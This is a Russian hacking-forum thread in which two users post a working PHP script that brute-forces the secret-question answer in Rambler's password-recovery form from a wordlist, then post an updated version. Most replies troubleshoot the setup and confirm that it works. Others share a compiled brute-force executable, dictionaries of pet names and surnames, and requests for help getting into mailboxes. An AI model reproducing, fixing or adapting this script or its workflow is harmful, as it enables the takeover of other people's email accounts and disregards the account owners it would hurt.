Дело было вечером, делать было нефига как общаться по аське, в этот раз фигней страдали с zifanchuck'ом профиль моего большого ачатовского друга вот http://forum.antichat.ru/member.php?userid=66836 Ну что- дискутировали по поводу- а можно ли подобрать брутом ответ на контрольный вопрос? Обьектом нашего изучения стал рамблер, и вот как мы непытались вручную (путем многократных запросов) уйти в бан- так нифига и неудавалось.... (каптчу просили ввести только один, самый первый раз ), вот на этой волне и родился данный скрипт который мы предоставляем Вашему вниманию. А еще у нас с ним пари- как быстро админы рамблера прикроют откровенный баг))) (на много слов не тестили но после 200-300 неправильных находит правильный ответ), ответы нужно складывать в файл my.txt (в столбик- разумееться :D )
А да и чтоб было все по честному в скрипте проостенькая защита от школьников, так что неспрашивайте почему выдает ошибку при подключении))) Ну а сам скрипт собственно говоря вот))
P.S. И прошу не пинать так как данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))


<?php
// (c)Kusto & zifanchuck
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}


function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}

$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];

$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);


//получаем адрес каптчи
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);
$c=$cap[1];
$id=$cap[2];


if($login)
{
$res = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$_POST['id']."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$_POST['captcha']."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0 %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$res, $qves)
}

if ($qves[1])
{
echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";
$a = explode("\r\n",read($file));

for($i=0;$i<count($a);$i++)
{
$fam = $a[$i];
$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
else {echo "ответ $fam не подошел <br>";}
flush();
}

}
else { echo "<B><U><FONT SIZE=5 COLOR=RED>Внимательно заполняем каптчу</FONT></U></B></br>";



echo ' <label for="captcha">Введите показанные на&nbsp;картинке символы:</label><br><br><br>
<span id="captcha-wrapper" title="Введите показанные на картинке символы">
<span class="secimage-wrapper">
<img id="secimage" src="'.$c.'" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы">
<span class="dummy"></span>
</span><br><br>
<form name="captcha_form" method="POST">
<input type="text" name="captcha" value="" /><br>
<input type="hidden" name="id" value="'.$id.'" />
';
$err = '
<html>
<head>

<body bgcolor=#c0c0c0>
<form method="POST">

<p align=center>

<label for="id-login">кого брутим?</label>
<span class="indicator">
<input type="text" class="text" name="login" />

<select id="id-domain" class="text" name="domain" tabindex="1">
<option value="rambler.ru" >@rambler.ru</option>
<option value="lenta.ru" >@lenta.ru</option>

<option value="myrambler.ru" >@myrambler.ru</option>
<option value="autorambler.ru" >@autorambler.ru</option>
<option value="ro.ru" >@ro.ru</option>
<option value="r0.ru" >@r0.ru</option>
</select>

</span><br><br><br><br><br><br>


<input type=submit value="ПОЕХАЛИ!!!">


</form>
</center>
</body>
<head>
</html>';
echo $err;
}
?>

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
случаем не защита от школьников ? )

нет-чуть ниже)))
P.S. ошибкуж выдает где косяк- кто хоть чуть чуть знает основы пыха- зделать рабочим скрипт дело одной секунды

мб пригодится. за старания +

В каком виде должны быть кукисы которые в cookies.txt ? :(

В каком виде должны быть кукисы которые в cookies.txt ?
Скрипт сам туда запишет че надо=)

zifanchuck - большое спасибо, Kusto тебе тоже, понаставил бы вам плюсов да больше одного не могу((( также я не грин так что они ничего не стоят(

Может еще подскажешь как обойти загадочную защиту от Школьнегов ? o_O
смотри личку

блин, с мозже поднимали эту тему дня 4 назад =\
спасибо за реализацию ;)

Warning: curl_setopt() [function.curl-setopt]: CURLOPT_FOLLOWLOCATION cannot be activated when in safe_mode or an open_basedir is set in /home/junfan/public_html/bals.php on line 16
типо надо safe_mode on ? А этот хостинг неподходит ?

типо надо safe_mode on ? А этот хостинг неподходит ?
на денвер ставь- и вообще хостинги нелюбят брут...

на денвер ставь- и вообще хостинги нелюбят брут...
всё заработало, теперь ввел мыло которое собрался брутить, вылетел секр. вопрос но не вижу где статус прогреса брута, так и должно быть ? (Cори за тупые вопросы) :)

Пофиксенно (исправленн скрипт в 1 посте)

так и должно быть (сначала на своем испытай)
ok, спс, а с одного IP можно только один брутить ?

можно несколько

всё заработало, теперь ввел мыло которое собрался брутить, вылетел секр. вопрос но не вижу где статус прогреса брута, так и должно быть ? (Cори за тупые вопросы) :)
Прошу прошение за небольшой косяк))))- скрипт был написанн на коленке и сообщает только о найденом пассе- счас добавим чтоб сообщал если все ответы неверны :D :D (еще раз прошу прощение)))
ИСПРАВЛЕННО в первом посте (защиту от школьников сохранил в том-же месте)

x3 наверно этот не для моего ума(((
на деневере пишет : Fatal error: Call to undefined function curl_init() in Y:\home\localhost\www\bals.php on line 8
На шелле всё норм, только 123 уже х3 сколько подбирает)))
http://efedor.ru/img/menu/bals.php вот готовый брут, который у меня к сожалению не работает(

x3 наверно этот не для моего ума(((
на деневере пишет : Fatal error: Call to undefined function curl_init() in Y:\home\localhost\www\bals.php on line 8
На шелле всё норм, только 123 уже х3 сколько подбирает)))
http://efedor.ru/img/menu/bals.php вот готовый брут, который у меня к сожалению не работает(
у тебя на денвере CURL неустановлен

Во всём разобрался, на сегодняшний день скрипт работает, большое спасибо :)
Пашет с хоста :)

только что провел тест- поставил правильный ответ на 999 позицию (т е запросов к серверу было порядка 1000) за 9 минут скрипт подобрал правильный ответ на вопрос
P.S. Это тем кто стучиться мне в личку с проьбами снять пресловутую "защиту" либо узнать скорость перебора)))

еще работает эта тема?))

Подскажите как исправить ошибку? Плиз )

Подскажите как исправить ошибку? Плиз )
актуален сегодня скрипт или нет - незнаю (думаю что нет), ошибка- как я и говорил- детская, в 49 строке пропущенна ; (мы ведь с вами уже большие и знаем что в пыхе логическим завершением функции являеться- ; ) , можете затестить, если не работает и вы выложите свой вариант - рабочий, - подниму репутацию (как я и говорил мне просто неинтересна поддержка скрипта т к ислледования были чисто из любопытства)

P.S. А да еще посмотрел скрипт- и увидел что форум в него всобачил пробел при отправке запроса к серваку....

По идее скрипт должен быть ещё актуален так как багу никто не прикрывал и походу не собираются

Parse error: syntax error, unexpected '}' in /var/upppp/1.php on line 50

Хм...и в чём проблема? :D

Хм...и в чём проблема? :D
уже-ж сняли защиту от скрипткидди, неужели 49 строку трудно закончить с помощью ; ???
https://forum.antichat.ru/showpost.php?p=2099570&postcount=23

А точно)), сори.
Но капчу не показывает :confused:

А точно)), сори.
Но капчу не показывает :confused: так подкорректируйте- неужели сложно? вродеж писали что багу неубрали, и я вроде выше писал что поддержка скрипта мне не интересна и если выложиш рабочий вариант здесь- подниму репу....(будет видно что не очередной скрипт кидди а думающий пользователь)

Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...

Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...
для меня вообще загадка что там сложного????? адрес капчи имеет вид http://id.rambler.ru/captcha/e5a412b61b86c8ff4dbe3cd1b7126fa2.jpg и вот этот хеш(e5a412b61b86c8ff4dbe3cd1b7126fa2) дергаем с регуляркой из адреса http://id.rambler.ru/script/reminder.cgi а конкретно из этой строчки

<input type="hidden" name="user.password" value="" />e5a412b61b86c8ff4dbe3cd1b7126fa2
(хеш разумееться каждый раз новый)
Так обьясните мне- неграмотному- чего здесь сложного????? (либо из другого там помоему 4 места откуда можно его дернуть....)

Капчу пробовал сделать...
но увы не получилось
_ttp://test5.6te.net/index.php

//получаем адрес каптчи
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);

не знаю что сделать с этой частью

ап подправьте кто нибудь скрипт.

Интересует данная тема.
И такой вопрос: кто-нибудь брутил на mail.ru?

Апдейт скрипта. Наверное последний. Сегодня просто сложились звезды, что я был не занят и мне было не впадлу что-то делать (такое бывает очень редко))))

вот


<?php
// (c)Kusto & zifanchuck V2
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}


function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}

$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];
$captcha = $_POST['captcha'];
$id = $_POST['id'];


if(!$domain||!$login||!$captcha||!$id)
{

$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);

//получаем адрес каптчи
preg_match('#<img id="secimage" src="http://id.rambler.ru/captcha/(.*).jpg"#iU',$result, $cap);
$id=$cap[1];

echo '<form method="POST">
<p align=center>
<label for="id-login">кого брутим?</label>
<span class="indicator">
<input type="text" class="text" name="login" />
<select id="id-domain" class="text" name="domain" tabindex="1">
<option value="rambler.ru" >@rambler.ru</option>
<option value="lenta.ru" >@lenta.ru</option>
<option value="myrambler.ru" >@myrambler.ru</option>
<option value="autorambler.ru" >@autorambler.ru</option>
<option value="ro.ru" >@ro.ru</option>
<option value="r0.ru" >@r0.ru</option>
</select>
</span><br>
<img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
Капча:<input type="text" name="captcha" value="" /><br>
<input type="hidden" name="id" value="'.$id.'" />
<input type=submit value="ПОЕХАЛИ!!!"></form>';
exit;
}
else
{
$answers = explode("\r\n",read($file));

$result = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$id."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$captcha."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0 %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$result, $qves);

if ($qves[1])
{
echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";

for($i=0;$i<count($answers);$i++)
{
$fam = $answers[$i];
$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
else {echo "ответ $fam не подошел <br>";}
flush();
}

}
else
{
echo '<form method="POST">
<p align=center>
<b>Неправильно ввели каптчу!</b><br>
<label for="id-login">кого брутим?</label>
<span class="indicator">
<input type="text" class="text" name="login" />
<select id="id-domain" class="text" name="domain" tabindex="1">
<option value="rambler.ru" >@rambler.ru</option>
<option value="lenta.ru" >@lenta.ru</option>
<option value="myrambler.ru" >@myrambler.ru</option>
<option value="autorambler.ru" >@autorambler.ru</option>
<option value="ro.ru" >@ro.ru</option>
<option value="r0.ru" >@r0.ru</option>
</select>
</span><br>
<img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
Капча:<input type="text" name="captcha" value="" /><br>
<input type="hidden" name="id" value="'.$id.'" />
<input type=submit value="ПОЕХАЛИ!!!"></form>';
}
}
?>

допишу сюда ссылку на исправленную версию
https://forum.antichat.ru/thread206154.html
чтоб не потерялась...

и добавлю в закладки на случай если пригодиться...

---
ЗЫ zifanchuck наверно меня опередил и уже запостил апдейт выше

допишу сюда ссылку на исправленную версию
https://forum.antichat.ru/thread206154.html
чтоб не потерялась...

и добавлю в закладки на случай если пригодиться...

---
ЗЫ zifanchuck наверно меня опередил и уже запостил апдейт выше
Я как раз для той темы и писал скрипт))) ну точнее не только для нее, а просто попал сегодея на темку, посмотрел что не только тот чел хочет скрипт и решил допилить)

братюни, что-то он не находит верный ответ на вопрос

братюни, что-то он не находит верный ответ на вопрос


только что (на денвере) проверил- правильный ответ поставил на 855 позицию(за все время испытаний- он ниразу не пропускал правильный ответ), правильный ответ был написанн кирилицей- скрипт его нашол за 7 минут, так что тема на сегодняшний день актуальна

P.S. Надеюсь что словарь для брута с предпологаемыми ответами ты назвал my.txt и слова в него сложил в столбик????, а так-же поместил в ту-же дирректорию где находиться скрипт? И не забываем что регистр ответа на контр вопрос- важен(т е Иванова и иванова - это совершенно два разных слова)

Проблемка появилась Но не пойму что там в 27й строке..

http://s47.radikal.ru/i117/1007/29/3d72e8b855ec.jpg

Использовался скритп "апдейт".

Всё работает, спасибо большое. Разобрался.

Есть 1 проблемка, не брутит Большие словари паролей.

Эх...еще бы это работало на yahoo.com ..

Эх...еще бы это работало на yahoo.com ..




данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))


хотя что то подобное можно начеркать и для большинства существующих сервисов)))

Попробовал. Возникает первая проблема - не выводит капчу. Хотя может быть $id скрипт не получает из-за каспера? Или может это меня проверка для школьников фильтрует, я ведь php не знаю -_-

Есть 1 проблемка, не брутит Большие словари паролей.


ясен пень 50 метров в него нельзя засунуть)) вся вина функции
function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}
можно конечно и переделать чтоб брало каждое слово последовательно, но зачем? опять же говорю что скрипт скорее всего учебный а не "боевой"

Попробовал. Возникает первая проблема - не выводит капчу. Хотя может быть $id скрипт не получает из-за каспера? Или может это меня проверка для школьников фильтрует, я ведь php не знаю -_-


пост 34 - обновленная версия (на первой странице пофиксили)


" if author else f"

Ponka said:

Есть 1 проблемка, не брутит Большие словари паролей.


ясен пень 50 метров в него нельзя засунуть)) вся вина функции
function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}
можно конечно и переделать чтоб брало каждое слово последовательно, но зачем? опять же говорю что скрипт скорее всего учебный а не "боевой"

Попробовал. Возникает первая проблема - не выводит капчу. Хотя может быть $id скрипт не получает из-за каспера? Или может это меня проверка для школьников фильтрует, я ведь php не знаю -_-


пост 34 - обновленная версия (на первой странице пофиксили)

скажите есть ли exe прога для брута контрольного вопроса

есть

пост 34 - обновленная версия (на первой странице пофиксили)


Так его я и пользую. Капчу всё равно не выводит.


есть


Дайте тогда пожалуйста ссылку на топик =)

Дайте тогда пожалуйста ссылку на топик =)


К сожалению (или к счастью) программа не в свободном доступе))

По столь подробному описанию уязвимости, мало-мальский рукастый кодер может написать такую легко

К сожалению (или к счастью) программа не в свободном доступе))
По столь подробному описанию уязвимости, мало-мальский рукастый кодер может написать такую легко


Ну думаю что к счастью. Уж лучше пусть школьники познают азы кодинга и учатся, чем ломают подряд всех на халяву. *поправил школьный галстук и пошел учить Delphi*

Так его я и пользую. Капчу всё равно не выводит.


Сегодня 11/07/2010 Скрипт актуален, капчу выводит, ответ подбирает

P.S.процентов 90 у тебя проблемма в хостинге (попробуй с денвера или используй платный хостинг)

ты не мог бы подкинуть ссылочку на базу пассов "Клички дом животных", а то найти не могу... А почту угнанную(мою) нуно оч вернуть

ты не мог бы подкинуть ссылочку на базу пассов "Клички дом животных", а то найти не могу... А почту угнанную(мою) нуно оч вернуть


где у тебя почта ?

где у тебя почта ?



На рамблере

этим скриптом можно брутить вопрос на mail.ru?

этим скриптом можно брутить вопрос на mail.ru?


rambler только

Для тех, кто не любит рнр-скрипты есть всё то же самое, только в виде ехешника:

http://gyazo.com/42f4c9df58f2f293effb8bbec4030e15.png

Вводите мыло, выбираете файл с ответами, жмёте старт, появляется капча, вводите символы. На ввод капчи выделил 10 секунд, потом она отправляется)) Не успели - новую вводить.

После этого пошел брут, однопоточный. Сам тестил, 180к ответов проверил, после чего встал - админы рамблера заблочили мой IP. Тестил на дедиках - пашет. Так что дырка до сих пор есть, ленивые админы лишь банят по IP.

Скачать можно ТУТ (http://avtuh.ru/files/RamblerQBrute.exe)

не так давно подобрался ответ на контрольный вопрос с помощью гугла))) Тупо вбиваешь запрос: любимое блюдо... В 3 строке выдачи было РЫБА ))) Совпало)) Извините за оффтоп, но не всегда нужно применение софта

За софтинку спасибо!

alkos

спс давно искал...

у кого-нибудь есть словарь женских фамилий?

у кого-нибудь есть словарь женских фамилий?


Вот тут посмотри:Тыц (http://www.familytree.ru/ru/dbf.htm) но там только идут в перемешку.

Вот тут посмотри:
Тыц (http://www.familytree.ru/ru/dbf.htm)
но там только идут в перемешку.


вооо, спасибо, в перемешку даже лучше

Если кому надо то вот словарик кличек собак/кошек (Тыц. (http://slil.ru/29494899) )

Ужо не работает, быстро перебирает 1-2 комбинации и стопорится. Хотя ручками всё норм работает без бана. Может таймаут ввели какой-то?

Ужо не работает, быстро перебирает 1-2 комбинации и стопорится. Хотя ручками всё норм работает без бана. Может таймаут ввели какой-то?



Только что попробовал все работает норм

Помогите с почтой

Ребята, кто бы мог помочь с рамблеровской почтой, пишите в 563-125-774

Nickal
Новичок
Регистрация: 24.07.2010
Сообщения: 2
Провел на форуме:
53 минуты 43 секунды


прочитай эту тему и ты сам себе поможешь. тут есть всё что нужно

Врядли смогу, уже пробовал, нужен конкретный спец по этим вопросам, конечно не за спасибо)

где найти словари ответов на вопросы: Любымие писатели, Имена...

Parse error: syntax error, unexpected '}' in /var/upppp/1.php on line 50

в чём проблема?

Parse error: syntax error, unexpected '}' in /var/upppp/1.php on line 50
в чём проблема?


скрипт бери отсюда

/showpost.php?p=2162759&postcount=34

в первом посте вопервых он неактуален, во вторых- ошибка это защита от школьников -там была пропущенна ";" перед скобкой

блин я многова еще не знаю, добавьтесь ко мне в аську подскажите пожалуйста, как все, и что к 4ему..

365462888...

в долгу не останусь)))

Не работает скрипт к сожалению , проверял .

выложите подробную проггу на майл.ру)

скрипт скорее всего уже не робит т.к. на рамблере доработали ситему q/a

подгоните словарь с кличками собак

жаль на рамблере каптчу ввели